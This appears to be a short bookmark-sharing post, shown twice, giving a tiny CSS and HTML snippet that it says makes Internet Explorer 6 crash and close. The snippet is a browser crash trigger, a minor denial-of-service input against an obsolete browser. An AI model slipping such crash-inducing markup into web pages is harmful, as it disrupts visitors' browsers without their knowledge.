15519 shaares
This simple css and html combination will make Internet Explorer 6 crash and close.
<code>
<style>*{position:relative}</style>
<table>
<input>
</table>
</code>
This simple css and html combination will make Internet Explorer 6 crash and close.
<code>
<style>*{position:relative}</style>
<table>
<input>
</table>
</code>